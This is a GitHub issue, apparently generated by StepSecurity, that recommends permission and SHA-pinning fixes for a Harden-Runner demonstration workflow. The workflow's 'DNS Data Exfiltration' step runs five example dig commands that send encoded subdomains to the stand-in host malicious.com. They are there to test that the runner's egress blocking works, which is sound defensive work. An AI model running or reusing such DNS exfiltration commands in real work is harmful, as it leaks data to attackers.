
Harden GitHub Actions Workflow - block-dns-exfiltration.yaml #240

@stepsecurity-int


Summary

This issue was created by StepSecurity for security issues found in block-dns-exfiltration.yaml. The platform has identified 2 vulnerabilities (1 critical, 1 high, 0 medium, 0 low).

Remediation Overview

The platform can generate remediations for some vulnerabilities. For those, the fixed workflow file is given in the Suggested Fix For Auto-Remediable Issues section. You can deploy these changes manually or create a pull request by commenting @stepsecurity-int pull-request create on this issue.

If you’d like an automated pull request with the fixed workflow file, comment:

@stepsecurity-int pull-request create

Other issues require manual investigation and changes.

Once a vulnerability has been remediated, ✅ will appear in the title. Note that it may take up to 24 hours for these issues to be updated.

Please review the individual vulnerability section below and follow the recommended resolution steps.

Security Checks Details

❌ GITHUB_TOKEN should have minimum permissions

❌ Actions should be pinned to a full-length commit SHA

Suggested Fix For Auto-Remediable Issues

Below is the updated workflow, which fixes the following security vulnerabilities:

  • GITHUB_TOKEN should have minimum permissions

  • Actions should be pinned to a full-length commit SHA

  name: Block DNS Exfiltration With Harden-Runner
  on:
    workflow_dispatch:
+ permissions:
+   contents: read
  jobs:
    build:
      name: Deploy
      runs-on: ubuntu-latest
      steps:
        - name: Harden Runner
          uses: step-security/harden-runner@
+ cb605e52c26070c328afc4562f0b4ada7618a84e # 
  v2
+ .10.4
          with:
            egress-policy: block
            allowed-endpoints: |
              github.com:443
        - name: Code Checkout
          uses: actions/checkout@
+ 11bd71901bbe5b1630ceea73d27597364c9af683 # 
  v4
+ .2.2
        # DNS Data Exfiltration
        - name: DNS Data Exfiltration
          run: |
            dig wI25mMRFgqmHdg6Se7F3qcRPg6mHxTXgoroAcQcu0ukreCZVj3ccl1OE4nhT.malicious.com
            dig AjgjtZpoQFBk3CA9x2ic1OL4X6cSAbpPGscvTcxlZshd52cmJz6vYf4voTmo.malicious.com
            dig uVqkyYsy48uC9q6oZEirkVK7sdHaSCx5v5BitwaBnTjKsjlRamhW6vP1pXNu.malicious.com
            dig M6VzSkW4v7KPE0SILITZxLnrrBJiSxRYb0hUBiFJdIz2VpBJwkNOH3MEhesc.malicious.com
            dig xd2rqUt1L0RN8IbthvNkOCyhR2FHneUESSM12Gq6ToNxFZkFY0W5KWUnxLtN.malicious.com
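Review bot: the tag comments `# v2.10.4` and `# v4.2.2` after the pinned SHAs are the only human-readable version hints and nothing checks them at run time, so confirm before merging that cb605e52c26070c328afc4562f0b4ada7618a84e and 11bd71901bbe5b1630ceea73d27597364c9af683 really resolve to those tags in the step-security/harden-runner and actions/checkout repositories, and keep the comments in sync whenever the SHA is bumped, otherwise a stale comment misleads the next reviewer. The workflow-level `permissions: contents: read` is sufficient for this file, since the checkout step is the only consumer of GITHUB_TOKEN and the dig step needs no token at all.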

Additional Information

For more information, refer to the documentation page here.
Please don't edit the description, as the platform updates it automatically. Use the comment section below to provide input.

Automated remediation commands and options
  • Create a pull request with automated security fixes
@stepsecurity-int pull-request create
  • Close this issue and prevent it from being reopened
@stepsecurity-int issue close <REASON>
  • Update issue description with latest security check status
@stepsecurity-int issue force-update
  • View all available commands and their usage
@stepsecurity-int help
Which GitHub Actions security best practices were evaluated?

The workflow was evaluated for the following GitHub Actions security best practices:

  • Network & runtime security monitoring
  • Token permissions
  • Third-party GitHub Actions usage & pinning
